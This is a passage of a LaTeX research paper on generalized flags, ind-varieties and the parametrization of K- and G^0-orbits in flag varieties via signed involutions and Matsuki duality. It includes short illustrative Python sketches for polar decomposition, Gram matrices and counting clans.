{\rm (b)} Let $H=\{g\in \mathrm{GL}(V):g(V_+)=V_+,\ g(V_-)=V_-\}$ where $V=V_+\oplus V_-$ is a decomposition such that
$(V_+^\perp,V_-^\perp)=(V_+,V_-)$ or $(V_-,V_+)$.
Then (\ref{2.2.1}) is fulfilled.
\end{lemma}
\begin{proof}
{\rm (a)}
Note that $G(V,\omega)=\{g\in\mathrm{GL}(V):g^*=g^{-1}\}$.
Consider $g\in H$ such that $\mathcal{F}'=g\mathcal{F}$.
The equality $(gF)^\perp=(g^*)^{-1}F^\perp$ holds for all subspaces $F\subset V$.
Since $\mathcal{F},\mathcal{F}'$ belong to $X_\omega$ we have $\mathcal{F}'=(g^*)^{-1}\mathcal{F}$,
hence $g^*g\mathcal{F}=\mathcal{F}$.
Let $g_1=g^*g$.
By \cite[Lemma 1.5]{Jantzen} there is a polynomial $P(t)\in\mathbb{C}[t]$ such that
$P(g_1)^2=g_1$. Set $h=P(g_1)$.
Then $h\in\mathrm{GL}(V)$ (since $h^2=g_1\in\mathrm{GL}(V)$), and (\ref{2.2.1}) shows that actually $h\in H$.
Moreover $h^*=h$ (since $h\in\mathbb{C}[g_1]$ and $g_1^*=g_1$)
and $h\mathcal{F}=\mathcal{F}$ (as each subspace in $\mathcal{F}$ is $g_1$-stable hence also $h$-stable).
Set $h_1:=gh^{-1}\in H$.
Then, on the one hand,
\[h_1^*=(h^*)^{-1}g^*=h^{-1}g_1g^{-1}=h^{-1}h^2g^{-1}=hg^{-1}=h_1^{-1}\,.\]
Thus $h_1\in H\cap G(V,\omega)$,
and on the other hand,
$h_1\mathcal{F}=gh^{-1}\mathcal{F}=g\mathcal{F}=\mathcal{F}'$. \\
{\rm (b)}
The equality $g^*(gF)^\perp=F^\perp$ (already mentioned) applied to $F=V_\pm$ yields $g^*\in H$, and thus $g^*g\in H$, whenever $g\in H$. This implies (\ref{2.2.1}).
\end{proof}
\begin{remark}
The proof of Lemma \ref{lemma-2.2.1}\,{\rm (a)} is inspired by \cite[\S1.4]{Jantzen}. We also refer to \cite{Nishiyama, Otha} for similar results and generalizations.
\end{remark}
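The mechanism of the proof of Lemma \ref{lemma-2.2.1}\,{\rm (a)} is that of a polar decomposition: $g=h_1h$ with $h^*=h$ fixing $\mathcal{F}$ and $h_1\in H\cap G(V,\omega)$. The following numerical sketch illustrates this in the simplest possible setting, real $2\times 2$ matrices with the standard symmetric form (so that $g^*={}^tg$), using the closed-form square root of a symmetric positive-definite $2\times 2$ matrix. All function names are ours; this is only an illustration of the argument, not of the general case.

```python
import math

def mul(A, B):
    return [[sum(A[i][k] * B[k][j] for k in range(2)) for j in range(2)]
            for i in range(2)]

def transpose(A):
    return [[A[j][i] for j in range(2)] for i in range(2)]

def inv(A):
    d = A[0][0] * A[1][1] - A[0][1] * A[1][0]
    return [[A[1][1] / d, -A[0][1] / d], [-A[1][0] / d, A[0][0] / d]]

def sqrt_spd(A):
    """Square root of a symmetric positive-definite 2x2 matrix A:
    sqrt(A) = (A + sqrt(det A) I) / sqrt(tr A + 2 sqrt(det A))."""
    s = math.sqrt(A[0][0] * A[1][1] - A[0][1] * A[1][0])
    t = math.sqrt(A[0][0] + A[1][1] + 2 * s)
    return [[(A[i][j] + (s if i == j else 0.0)) / t for j in range(2)]
            for i in range(2)]

# g1 = g* g is self-adjoint; h = sqrt(g1) satisfies h* = h and h^2 = g1,
# and h1 = g h^{-1} lies in G(V, omega): h1* h1 = h^{-1} g* g h^{-1} = id.
g = [[2.0, 1.0], [0.0, 1.0]]
g1 = mul(transpose(g), g)
h = sqrt_spd(g1)
h1 = mul(g, inv(h))
```

Here $h$ is a polynomial in $g_1$ (a degree-one polynomial, by the displayed formula), matching the role played by $P(g_1)$ in the proof.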
\subsection{Ind-varieties of generalized flags}
\label{S2.3}
Recall that $\mathbf{V}$ denotes a complex vector space of countable dimension,
with a basis $E=(e_\ell)_{\ell\in\mathbb{N}^*}$.
\begin{definition}[\cite{Dimitrov-Penkov}]
Let $\mathcal{F}$ be a chain of subspaces in $\mathbf{V}$, i.e., a set of subspaces of $\mathbf{V}$ which is totally ordered by inclusion. Let $\mathcal{F}'$ (resp., $\mathcal{F}''$) be the subchain consisting of all $F\in\mathcal{F}$ with an immediate successor (resp., an immediate predecessor).
By $s(F)\in\mathcal{F}''$ we denote the immediate successor of $F\in\mathcal{F}'$.
A {\em generalized flag} in $\mathbf{V}$ is a chain of subspaces $\mathcal{F}$ such that:
\begin{itemize}
\item[\rm (i)] each $F\in\mathcal{F}$ has an immediate successor or predecessor,
i.e., $\mathcal{F}=\mathcal{F}'\cup\mathcal{F}''$;
\item[\rm (ii)] for every $v\in\mathbf{V}\setminus\{0\}$ there is a unique $F_v\in\mathcal{F}'$ such that $v\in s(F_v)\setminus F_v$, i.e.,
$\mathbf{V}\setminus\{0\}=\bigcup_{F\in\mathcal{F}'}(s(F)\setminus F)$.
\end{itemize}
A generalized flag is {\em maximal} if it is not properly contained in another generalized flag.
Specifically, $\mathcal{F}$ is maximal if and only if $\dim s(F)/F=1$ for all $F\in\mathcal{F}'$.
\end{definition}
\begin{notation}
Let $\sigma:\mathbb{N}^*\to (A,\prec)$ be a surjective map onto a totally ordered set.
Let $\underline{v}=(v_1,v_2,\ldots)$ be a basis of $\mathbf{V}$.
For every $a\in A$, let
\[F'_a=\langle v_\ell:\sigma(\ell)\prec a\rangle_\mathbb{C},\quad
F''_a=\langle v_\ell:\sigma(\ell)\preceq a\rangle_\mathbb{C}.\]
Then $\mathcal{F}=\mathcal{F}_\sigma(\underline{v}):=\{F'_a,F''_a:a\in A\}$ is a generalized flag such that
$\mathcal{F}'=\{F'_a:a\in A\}$, $\mathcal{F}''=\{F''_a:a\in A\}$, and $s(F'_a)=F''_a$ for all $a$.
We call such a generalized flag {\em compatible with the basis $\underline{v}$}.
Moreover, $\mathcal{F}_\sigma(\underline{v})$ is maximal if and only if the map $\sigma$ is bijective.
We use the abbreviation $\mathcal{F}_\sigma:=\mathcal{F}_\sigma(E)$.
Note that every generalized flag has a compatible basis \cite[Proposition 4.1]{Dimitrov-Penkov}.
A generalized flag is {\em weakly compatible with $E$} if it is compatible with some basis $\underline{v}$ such that $E\setminus(E\cap \underline{v})$ is finite (equivalently, $\dim\mathbf{V}/\langle E\cap \underline{v}\rangle_\mathbb{C}<\infty$).
\end{notation}
The group $\mathbf{G}(E)$ (as well as $\mathrm{Aut}(\mathbf{V})$) acts on generalized flags in a natural way.
Let $\mathbf{P}_\mathcal{F}\subset\mathbf{G}(E)$ denote the ind-subgroup of elements preserving $\mathcal{F}$.
It is a closed ind-subgroup of $\mathbf{G}(E)$.
If $\mathcal{F}$ is compatible with $E$, then $\mathbf{P}_\mathcal{F}$ is a splitting parabolic ind-subgroup of $\mathbf{G}(E)$ in the sense that
it is locally parabolic (i.e., there exists an exhaustion of $\mathbf{G}(E)$ by finite-dimensional reductive algebraic subgroups $G_n$ such that the intersections $\mathbf{P}_\mathcal{F}\cap G_n$ are parabolic subgroups of $G_n$) and contains the Cartan ind-subgroup $\mathbf{H}(E)\subset \mathbf{G}(E)$ of elements diagonal in $E$.
Moreover if $\mathcal{F}$ is maximal, then $\mathbf{B}_\mathcal{F}:=\mathbf{P}_\mathcal{F}$ is a splitting Borel ind-subgroup
(i.e., all intersections $\mathbf{B}_\mathcal{F}\cap G_n$ as above are Borel subgroups of $G_n$).
\begin{definition}[\cite{Dimitrov-Penkov}]
Two generalized flags $\mathcal{F},\mathcal{G}$ are called {\em $E$-commensurable}
if $\mathcal{F},\mathcal{G}$ are weakly compatible with $E$, and there is an isomorphism $\phi:\mathcal{F}\to\mathcal{G}$ of ordered sets and a finite dimensional subspace $U\subset\mathbf{V}$ such that
\begin{itemize}
\item[\rm (i)] $\phi(F)+U=F+U$ for all $F\in\mathcal{F}$;
\item[\rm (ii)] $\dim \phi(F)\cap U=\dim F\cap U$ for all $F\in\mathcal{F}$.
\end{itemize}
\end{definition}
$E$-commensurability is an equivalence relation on the set of generalized flags weakly compatible with $E$. In fact, according to the following proposition, each equivalence class consists of a single $\mathbf{G}(E)$-orbit.
If $\mathcal{F}$ is a generalized flag weakly compatible with $E$ we denote by $\mathbf{X}(\mathcal{F},E)$ the set of generalized flags which are $E$-commensurable with $\mathcal{F}$.
\begin{proposition}[\cite{Dimitrov-Penkov}]
\label{P2.3-1}
The set $\mathbf{X}=\mathbf{X}(\mathcal{F},E)$ is endowed with a natural structure of ind-variety.
Moreover $\mathbf{X}$ is $\mathbf{G}(E)$-homogeneous and the map $g\mapsto g\mathcal{F}$ induces an isomorphism of ind-varieties $\mathbf{G}(E)/\mathbf{P}_\mathcal{F}\stackrel{\sim}{\to}\mathbf{X}$.
\end{proposition}
\begin{proposition}[\cite{Fresse-Penkov}]
\label{P2-3.2}
Let $\sigma:\mathbb{N}^*\to (A,\prec)$ and $\tau:\mathbb{N}^*\to (B,\prec)$ be maps onto two totally ordered sets.
\begin{itemize}
\item[\rm (a)] Each $E$-compatible generalized flag in $\mathbf{X}(\mathcal{F}_\sigma,E)$ is of the form $\mathcal{F}_{\sigma w}$ for $w\in \mathfrak{S}_\infty$.
Moreover $\mathcal{F}_{\sigma w}=\mathcal{F}_{\sigma w'}\Leftrightarrow
w'w^{-1}\in\mathrm{Stab}_\sigma:=\{v\in\mathfrak{S}_\infty:\sigma v=\sigma\}$.
\item[\rm (b)] Assume that $\mathcal{F}_\tau$ is maximal (i.e., $\tau$ is bijective)
so that $\mathbf{B}_{\mathcal{F}_\tau}$ is a splitting Borel ind-subgroup.
Then each $\mathbf{B}_{\mathcal{F}_\tau}$-orbit of $\mathbf{X}(\mathcal{F}_\sigma,E)$
contains a unique element of the form $\mathcal{F}_{\sigma w}$ for $w\in\mathfrak{S}_\infty/\mathrm{Stab}_\sigma$.
\item[\rm (c)] In particular, if $\mathcal{F}_\sigma,\mathcal{F}_\tau$ are both maximal (i.e., $\sigma,\tau$ are both bijective), then
\begin{eqnarray*}
\displaystyle \mathbf{X}(\mathcal{F}_\tau,E)\times\mathbf{X}(\mathcal{F}_\sigma,E)=\bigsqcup_{w\in\mathfrak{S}_\infty}(\pmb{\mathbb{O}}_{\tau,\sigma})_w
\end{eqnarray*}
where
\begin{eqnarray*}
(\pmb{\mathbb{O}}_{\tau,\sigma})_w:=\{(g\mathcal{F}_\tau,g\mathcal{F}_{\sigma w}):g\in\mathbf{G}(E)\}
\end{eqnarray*}
is a decomposition of $\mathbf{X}(\mathcal{F}_\tau,E)\times\mathbf{X}(\mathcal{F}_\sigma,E)$ into $\mathbf{G}(E)$-orbits.
\end{itemize}
\end{proposition}
\begin{remark}
The orbit $(\pmb{\mathbb{O}}_{\tau,\sigma})_w$
of Proposition \ref{P2-3.2}\,{\rm (c)}
actually consists of all pairs of generalized flags $(\mathcal{F}_\tau(\underline{v}),\mathcal{F}_{\sigma w}(\underline{v}))$
weakly compatible with the basis $\underline{v}=(v_1,v_2,\ldots)$.
\end{remark}
Assume $\mathbf{V}$ is endowed with a nondegenerate symmetric or symplectic form $\omega$ whose values on the basis $E$ are given by the matrix $\Omega$ in (\ref{omega}).
\begin{definition}
A generalized flag $\mathcal{F}$ is called {\em $\omega$-isotropic} if
the map $F\mapsto F^\perp:=\{x\in\mathbf{V}:\omega(x,y)=0\ \forall y\in F\}$
is a well-defined involution of $\mathcal{F}$.
\end{definition}
\begin{proposition}[\cite{Dimitrov-Penkov}]
\label{P2.3-3}
Let $\mathcal{F}$ be an $\omega$-isotropic generalized flag weakly compatible with $E$.
The set $\mathbf{X}_\omega(\mathcal{F},E)$ of all
$\omega$-isotropic generalized flags which are $E$-commensurable with $\mathcal{F}$
is a $\mathbf{G}(E,\omega)$-homogeneous, closed ind-subvariety of $\mathbf{X}(\mathcal{F},E)$.
\end{proposition}
Finally, we emphasize that one of the main features of classical ind-groups is that their Borel ind-subgroups are not all $\mathrm{Aut}(\mathbf{G})$-conjugate. Here are three examples of maximal generalized flags in $\mathbf{V}$, compatible with the basis $E$, whose stabilizers in $\mathbf{G}(E)$ are pairwise non-conjugate under $\mathrm{Aut}(\mathbf{G})$.
\begin{example}
{\rm (a)} Let $\sigma_1:\mathbb{N}^*\to(\mathbb{N}^*,<)$, $\ell\mapsto\ell$.
The generalized flag $\mathcal{F}_{\sigma_1}$ is an ascending chain of subspaces
$\mathcal{F}_{\sigma_1}=\{0=F_0\subset F_1\subset F_2\subset\ldots\}$ isomorphic to $(\mathbb{N},<)$ as an ordered set.
\\
{\rm (b)} Let $\sigma_2:\mathbb{N}^*\to\Big(\{\frac{1}{n}:n\in\mathbb{Z}^*\},<\Big)$, $\ell\mapsto \frac{(-1)^\ell}{\ell}$.
The generalized flag $\mathcal{F}_{\sigma_2}$ is a chain of the form
$\mathcal{F}_{\sigma_2}=\{0=F_0\subset F_1\subset\ldots\subset F_{-2}\subset F_{-1}=\mathbf{V}\}$
and is not isomorphic, as an ordered set, to a subset of $(\mathbb{Z},<)$.
\\
{\rm (c)} Let $\sigma_3:\mathbb{N}^*\to(\mathbb{Q},<)$ be a bijection.
In this case no subspace $F\in\mathcal{F}_{\sigma_3}$ has both an immediate successor and an immediate predecessor.
\end{example}
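The order type in example (b) can be checked concretely: the negative values $\frac{1}{n}$ ($n<0$) in the image of $\sigma_2$ form an increasing chain of type $\omega$ lying below all positive values $\frac{1}{n}$ ($n>0$), which form a chain of type $\omega^*$ above them. A small illustrative computation with exact rational arithmetic:

```python
from fractions import Fraction

# sigma_2 sends l to (-1)^l / l; sort the first eight values. Negative
# values increase towards 0 and positive values accumulate at 0 from
# above, so the ordered image looks like -1 < -1/3 < ... < 1/4 < 1/2.
values = sorted(Fraction((-1) ** l, l) for l in range(1, 9))
```

This matches the chain $0=F_0\subset F_1\subset\ldots\subset F_{-2}\subset F_{-1}=\mathbf{V}$ indexed by $\mathbb{Z}^*$ via $n\mapsto\frac{1}{n}$.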
\section{Parametrization of orbits in the finite-dimensional case}
\label{S3}
In Sections~\ref{S3.1}--\ref{S3.3}, we state explicit parametrizations of the $K$- and $G^0$-orbits in the finite-dimensional case. All proofs are given in Section~\ref{S3.5}.
\subsection{Types A1 and A2}
\label{S3.1}
Let the notation be as in Subsection~\ref{S:A1A2}.
The space $V=V_n:=\langle e_1,\ldots,e_n\rangle_\mathbb{C}$ is endowed with the symmetric
or symplectic form $\omega(x,y)={}^tx\cdot \Omega\cdot y$ and the conjugation $\gamma(x)=\Omega\overline{x}$ which actually stand for the restrictions to $V$ of the maps $\omega,\gamma$ introduced in Section \ref{S2.1}.
This allows us to define two involutions of the flag variety $X$:
\[
\mathcal{F}=(F_0,\ldots,F_n)\mapsto\mathcal{F}^\perp:=(F_n^\perp,\ldots,F_0^\perp)
\quad\mbox{and}\quad
\mathcal{F}\mapsto\gamma(\mathcal{F}):=(\gamma(F_0),\ldots,\gamma(F_n))
\]
where $F^\perp\subset V$ stands for the subspace orthogonal to $F$ with respect to $\omega$.
Let $K=\{g\in\mathrm{GL}(V):\mbox{$g$ preserves $\omega$}\}$
and $G^0=\{g\in\mathrm{GL}(V):\gamma g=g\gamma\}$.
By $\mathfrak{I}_n\subset\mathfrak{S}_n$ we denote the
subset of involutions.
If $n=2m$ is even, we let $\mathfrak{I}'_n\subset\mathfrak{I}_n$
be the subset of involutions $w$ without fixed points.
\begin{definition}
\label{DA12}
Let $w\in\mathfrak{I}_n$. Set $\epsilon:=1$ in type A1 and
$\epsilon:=-1$ in type A2. A basis $(v_1,\ldots,v_n)$ of $V$ such that
\[\omega(v_k,v_\ell)=\left\{\begin{array}{ll} 1 & \mbox{if $w_k=\ell\geq k$} \\ \epsilon & \mbox{if $w_k=\ell< k$} \\ 0 & \mbox{if $w_k\not=\ell$} \end{array}\right.
\ \mbox{ for all $k,\ell\in\{1,\ldots,n\}$}\] is said to be {\em
$w$-dual}. A basis $(v_1,\ldots,v_n)$ of $V$ such that
\[
\gamma(v_k)=\left\{\begin{array}{ll} \epsilon v_{w_k} & \mbox{if $w_k\geq k$}
\\ v_{w_k} & \mbox{if $w_k< k$}
\end{array}\right.
\ \mbox{ for all $k\in\{1,\ldots,n\}$}
\]
is said to be {\em $w$-conjugate}. Set
\begin{eqnarray*}
& \mathcal{O}_w=\{\mathcal{F}(v_1,\ldots,v_n):\mbox{$(v_1,\ldots,v_n)$ is a $w$-dual basis}\}, \\[1mm]
& \mathfrak{O}_w=\{\mathcal{F}(v_1,\ldots,v_n):\mbox{$(v_1,\ldots,v_n)$ is a $w$-conjugate basis}\}.
\end{eqnarray*}
\end{definition}
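The conditions of Definition \ref{DA12} say that the Gram matrix of $\omega$ in a $w$-dual basis depends only on $w$ and $\epsilon$. A minimal sketch building this matrix (the function name is ours, for illustration only):

```python
def w_dual_gram(w, eps):
    """Gram matrix (omega(v_k, v_l))_{k,l} of a w-dual basis, where w is a
    1-indexed involution given as a list and eps = 1 (type A1) or -1
    (type A2): the entry is 1 if w_k = l >= k, eps if w_k = l < k,
    and 0 otherwise."""
    n = len(w)
    M = [[0] * n for _ in range(n)]
    for k in range(1, n + 1):
        l = w[k - 1]
        M[k - 1][l - 1] = 1 if l >= k else eps
    return M
```

For $\epsilon=1$ the resulting matrix is symmetric, while for $\epsilon=-1$ (where $w\in\mathfrak{I}'_n$ has no fixed points) it is antisymmetric, in accordance with the type of the form $\omega$.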
\begin{proposition}
\label{P1} Let $\mathfrak{I}_n^\epsilon=\mathfrak{I}_n$ in type A1
and $\mathfrak{I}_n^\epsilon=\mathfrak{I}'_n$ in type A2. Recall the notation
$\mathbb{O}_w$ and $w_0$ introduced in Section \ref{S2.2}.
\begin{itemize}
\item[\rm (a)]
For every $w\in\mathfrak{I}_n^\epsilon$ we have
$\mathcal{O}_w\not=\emptyset$, $\mathfrak{O}_w\not=\emptyset$
and
\[\mathcal{O}_w\cap\mathfrak{O}_w=\{\mathcal{F}(v_1,\ldots,v_n):\mbox{$(v_1,\ldots,v_n)$ is both $w$-dual and $w$-conjugate}\}\not=\emptyset.\]
\item[\rm (b)]
For every $w\in \mathfrak{I}_n^\epsilon$,
\[
\mathcal{O}_w=\{\mathcal{F}\in
X:(\mathcal{F}^\perp,\mathcal{F})\in\mathbb{O}_{w_0w}\}
\quad\mbox{and}\quad \mathfrak{O}_w=\{\mathcal{F}\in
X:(\gamma(\mathcal{F}),\mathcal{F})\in\mathbb{O}_{w}\}.
\]
\item[\rm (c)]
The subsets $\mathcal{O}_w$ ($w\in\mathfrak{I}_n^\epsilon$) are
exactly the $K$-orbits of $X$. The subsets $\mathfrak{O}_w$
($w\in\mathfrak{I}_n^\epsilon$) are exactly the $G^0$-orbits of $X$.
\item[\rm (d)]
The map $\mathcal{O}_w\mapsto\mathfrak{O}_w$ is Matsuki duality.
\end{itemize}
\end{proposition}
\subsection{Type A3}
\label{S3.2}
Let the notation be as in Subsection~\ref{S:A3}: the space $V=V_n=\langle e_1,\ldots,e_n\rangle_\mathbb{C}$ is endowed with the Hermitian form $\phi(x,y)={}^t\overline{x}\Phi y$ and a conjugation $\delta(x)=\Phi x$ where $\Phi$ is a diagonal matrix with entries $\epsilon_1,\ldots,\epsilon_n\in\{+1,-1\}$ (the upper left $n\times n$ corner of the matrix $\Phi$ of Section \ref{S2.1}).
Set $V_+=\langle e_k:\epsilon_k=1\rangle_\mathbb{C}$ and $V_-=\langle e_k:\epsilon_k=-1\rangle_\mathbb{C}$. Then $V=V_+\oplus V_-$.
Let $K=\{g\in\mathrm{GL}(V):\delta g=g\delta\}=\mathrm{GL}(V_+)\times\mathrm{GL}(V_-)$ and $G^0=\{g\in \mathrm{GL}(V):\mbox{$g$ preserves $\phi$}\}$.
As in Section \ref{S3.1} we get two involutions of the flag variety $X$:
\[\mathcal{F}=(F_0,\ldots,F_n)\mapsto\delta(\mathcal{F}):=(\delta(F_0),\ldots,\delta(F_n))\quad\mbox{and}\quad\mathcal{F}\mapsto\mathcal{F}^\dag:=(F_n^\dag,\ldots,F_0^\dag)\]
where $F^\dag\subset V$ stands for the orthogonal of $F\subset V$ with respect to $\phi$.
The Hermitian form induced by $\phi$ on the quotient $F/(F\cap F^\dag)$ is
nondegenerate; we denote its signature by $\varsigma(\phi:F)$. Given $\mathcal{F}=(F_0,\ldots,F_n)\in X$, let
\[\varsigma(\phi:\mathcal{F}):=\big(\varsigma(\phi:F_\ell)\big)_{\ell=1}^n\in(\{0,\ldots,n\}^2)^n.\]
Similarly,
\[\varsigma(\delta:\mathcal{F}):=\big((\dim F_\ell\cap V_+,\dim F_\ell\cap V_-)\big)_{\ell=1}^n\in(\{0,\ldots,n\}^2)^n\]
records the relative position of $\mathcal{F}$ with respect to the subspaces
$V_+$ and
$V_-$.
\medskip
\paragraph{\bf Combinatorial notation}
We call a {\em signed involution} a pair $(w,\varepsilon)$ consisting of
an involution $w\in\mathfrak{I}_n$ and signs
$\varepsilon_k\in\{+1,-1\}$ attached to its fixed points
$k\in\{\ell:w_\ell=\ell\}$.
(Equivalently $\varepsilon$ is a map $\{\ell:w_\ell=\ell\}\to\{+1,-1\}$.)
It is convenient to represent $w$ by a graph $l(w)$ (called {\em link pattern}) with $n$ vertices
$1,2,\ldots,n$ and an arc $(k,w_k)$ connecting $k$ and $w_k$ whenever $k<w_k$.
The {\em signed link pattern $l(w,\varepsilon)$} is
obtained from the graph $l(w)$ by marking each vertex
$k\in\{\ell:w_\ell=\ell\}$ with the label $+$ or $-$ depending on
whether $\varepsilon_k=+1$ or $\varepsilon_k=-1$.
For instance, the signed link pattern (where the numbering of vertices is implicit)
\[
\begin{picture}(140,30)(-20,-5)
\courbe{-16}{32}{0}{8}{10}{12}{16} \courbe{0}{80}{0}{36}{40}{44}{24}
\courbe{96}{112}{0}{103}{104}{105}{6} \put(-18,-3){$\bullet$}
\put(-2,-3){$\bullet$} \put(14,-3){$\bullet$} \put(13,-9){$+$}
\put(30,-3){$\bullet$} \put(46,-3){$\bullet$} \put(45,-9){$-$}
\put(62,-3){$\bullet$} \put(61,-9){$+$} \put(78,-3){$\bullet$}
\put(94,-3){$\bullet$} \put(110,-3){$\bullet$}
\end{picture}
\]
represents $(w,\varepsilon)$ with
$w=(1;4)(2;7)(8;9)\in\mathfrak{I}_9$ and
$(\varepsilon_3,\varepsilon_5,\varepsilon_6)=(+1,-1,+1)$.
We define $\varsigma(w,\varepsilon):=\{(p_\ell,q_\ell)\}_{\ell=1}^n$
as the sequence where $p_\ell$ (resp., $q_\ell$) is the number of $+$ signs
(resp., $-$ signs) among the first $\ell$ vertices of $l(w,\varepsilon)$,
plus the number of arcs with both endpoints among these first $\ell$ vertices.
Assuming $n=p+q$, let $\mathfrak{I}_n(p,q)$ be the set of
signed involutions of signature $(p,q)$, i.e., such that $(p_n,q_n)=(p,q)$.
Note that the elements of $\mathfrak{I}_n(p,q)$ coincide with the clans of signature $(p,q)$
in the sense of \cite{MO,Y}.
For instance, for the above pair
$(w,\varepsilon)$ we have
$(w,\varepsilon)\in\mathfrak{I}_9(5,4)$ and
\[
\varsigma(w,\varepsilon)=\big((0,0),(0,0),(1,0),(2,1),(2,2),(3,2),(4,3),(4,3),(5,4)\big).
\]
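The sequence $\varsigma(w,\varepsilon)$ is easy to compute mechanically. The following Python sketch (ours, not part of the paper; \texttt{signature\_sequence} is a name we introduce) reads ``arcs among the first $\ell$ vertices'' as arcs with both endpoints $\leq\ell$, which is the reading that matches the example above.

```python
def signature_sequence(w, eps):
    """Compute varsigma(w, eps) for a signed involution.

    w   : dict k -> w_k describing an involution of {1, ..., n}
    eps : dict assigning +1 or -1 to each fixed point of w

    Returns the list of pairs (p_l, q_l), l = 1..n, where p_l (resp. q_l)
    counts the '+' signs (resp. '-' signs) and the arcs whose two endpoints
    both lie among the first l vertices of the link pattern l(w, eps)."""
    n = len(w)
    seq = []
    for l in range(1, n + 1):
        arcs = sum(1 for k in range(1, l + 1) if k < w[k] <= l)
        plus = sum(1 for k in range(1, l + 1) if w[k] == k and eps[k] == +1)
        minus = sum(1 for k in range(1, l + 1) if w[k] == k and eps[k] == -1)
        seq.append((plus + arcs, minus + arcs))
    return seq

# The example above: w = (1;4)(2;7)(8;9), signs (+, -, +) at 3, 5, 6.
w = {1: 4, 4: 1, 2: 7, 7: 2, 8: 9, 9: 8, 3: 3, 5: 5, 6: 6}
eps = {3: +1, 5: -1, 6: +1}
```

Running \texttt{signature\_sequence(w, eps)} on this input returns the sequence displayed above, ending in $(5,4)$, consistent with $(w,\varepsilon)\in\mathfrak{I}_9(5,4)$.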
\begin{definition}
\label{D2}
\label{DA3}
Given a signed involution
$(w,\varepsilon)$, we say that
a basis $(v_1,\ldots,v_n)$ of $V$ is \emph{$(w,\varepsilon)$-conjugate} if
\[
\delta(v_k)=\left\{\begin{array}{ll} \varepsilon_kv_{w_k} & \mbox{if
$w_k=k$}
\\ v_{w_k} & \mbox{if $w_k\not=k$}
\end{array}\right.
\ \mbox{ for all $k\in\{1,\ldots,n\}$\,.}
\]
A basis
$(v_1,\ldots,v_n)$ such that
\[\phi(v_k,v_\ell)=\left\{\begin{array}{ll} \varepsilon_k & \mbox{if $w_k=\ell=k$} \\ 1 & \mbox{if $w_k=\ell\not=k$} \\ 0 & \mbox{if $w_k\not=\ell$} \end{array}\right.
\ \mbox{ for all $k,\ell\in\{1,\ldots,n\}$}\] is said to be {\em
$(w,\varepsilon)$-dual}.
We set
\begin{eqnarray*}
& \mathcal{O}_{(w,\varepsilon)}=\{\mathcal{F}(v_1,\ldots,v_n):\mbox{$(v_1,\ldots,v_n)$ is a $(w,\varepsilon)$-conjugate basis}\}, \\[1mm]
& \mathfrak{O}_{(w,\varepsilon)}=\{\mathcal{F}(v_1,\ldots,v_n):\mbox{$(v_1,\ldots,v_n)$ is a $(w,\varepsilon)$-dual basis}\}.
\end{eqnarray*}
\end{definition}
\begin{proposition}
\label{P2}
In addition to the above notation, let $(p,q)=(\dim V_+,\dim V_-)$. Then:
\begin{itemize}
\item[\rm (a)] For every $(w,\varepsilon)\in\mathfrak{I}_n(p,q)$ the subsets $\mathcal{O}_{(w,\varepsilon)}$ and $\mathfrak{O}_{(w,\varepsilon)}$ are nonempty, and
\[\mathcal{O}_{(w,\varepsilon)}\cap\mathfrak{O}_{(w,\varepsilon)}
=\{\mathcal{F}(\underline{v}):\mbox{$\underline{v}=(v_k)_{k=1}^n$ is $(w,\varepsilon)$-dual and $(w,\varepsilon)$-conjugate}\}\not=\emptyset.\]
\item[\rm (b)]
For every $(w,\varepsilon)\in \mathfrak{I}_n(p,q)$,
\begin{eqnarray*}
& \mathcal{O}_{(w,\varepsilon)}=\big\{\mathcal{F}\in
X: (\delta(\mathcal{F}),\mathcal{F})\in\mathbb{O}_{w}\mbox{ and
}\varsigma(\delta:\mathcal{F})=\varsigma(w,\varepsilon)\big\}, \\
&\mathfrak{O}_{(w,\varepsilon)}=\big\{\mathcal{F}\in X:
(\mathcal{F}^\dag,\mathcal{F})\in\mathbb{O}_{w_0w}\mbox{ and
}\varsigma(\phi:\mathcal{F})=\varsigma(w,\varepsilon)\big\}.
\end{eqnarray*}
\item[\rm (c)]
The subsets $\mathcal{O}_{(w,\varepsilon)}$
($(w,\varepsilon)\in\mathfrak{I}_n(p,q)$) are exactly the $K$-orbits
of $X$. The subsets $\mathfrak{O}_{(w,\varepsilon)}$
($(w,\varepsilon)\in\mathfrak{I}_n(p,q)$) are exactly the
$G^0$-orbits of $X$.
\item[\rm (d)]
The map
$\mathcal{O}_{(w,\varepsilon)}\mapsto\mathfrak{O}_{(w,\varepsilon)}$
is Matsuki duality.
\end{itemize}
\end{proposition}
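Proposition \ref{P2}\,(c) says in particular that the number of $K$-orbits on $X$ equals $|\mathfrak{I}_n(p,q)|$. A brute-force enumeration of signed involutions (a Python sketch under our own conventions, not part of the paper) makes this count accessible in small rank; for instance, for $(p,q)=(1,1)$ it returns $3$, matching the three $\mathrm{GL}_1\times\mathrm{GL}_1$-orbits on the flag variety $\mathbb{P}^1$ of $\mathrm{GL}_2$ (the two fixed points and the open orbit).

```python
from itertools import product

def involutions(points):
    """All involutions of the tuple `points`, as dicts k -> w_k."""
    if not points:
        yield {}
        return
    a, rest = points[0], points[1:]
    for w in involutions(rest):          # a is a fixed point
        yield {a: a, **w}
    for i, b in enumerate(rest):         # a is joined to b by an arc
        for w in involutions(rest[:i] + rest[i + 1:]):
            yield {a: b, b: a, **w}

def clans(n, p, q):
    """All signed involutions (w, eps) of signature (p, q), with p + q = n:
    each arc counts once toward p and once toward q, each fixed point counts
    toward p or q according to its sign."""
    for w in involutions(tuple(range(1, n + 1))):
        fixed = sorted(k for k in w if w[k] == k)
        arcs = (n - len(fixed)) // 2
        for signs in product([1, -1], repeat=len(fixed)):
            plus = signs.count(1)
            if (plus + arcs, len(fixed) - plus + arcs) == (p, q):
                yield w, dict(zip(fixed, signs))
```

Summing over all signatures recovers the total number of signed involutions, $\sum_{w\in\mathfrak{I}_n}2^{\#\{\ell:w_\ell=\ell\}}$ (e.g.\ $14$ for $n=3$).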
\subsection{Types B, C, D}
\label{S3.3}
In this section we assume that the space $V=V_n=\langle e_1,\ldots,e_n\rangle_\mathbb{C}$ is endowed with a symmetric or symplectic form $\omega$ whose action on the basis $(e_1,\ldots,e_n)$ is described by the matrix $\Omega$
in (\ref{omega}).
We consider the group $G=G(V,\omega)=\{g\in\mathrm{GL}(V):\mbox{$g$ preserves $\omega$}\}$ and the variety of isotropic flags $X_\omega=\{\mathcal{F}\in X:\mathcal{F}^\perp=\mathcal{F}\}$
(see Section \ref{S2.2}).
In addition we assume that $V$ is endowed with a hermitian form $\phi$, a conjugation $\delta$, and a decomposition $V=V_+\oplus V_-$ (as in Section \ref{S3.2}) such that
\begin{itemize}
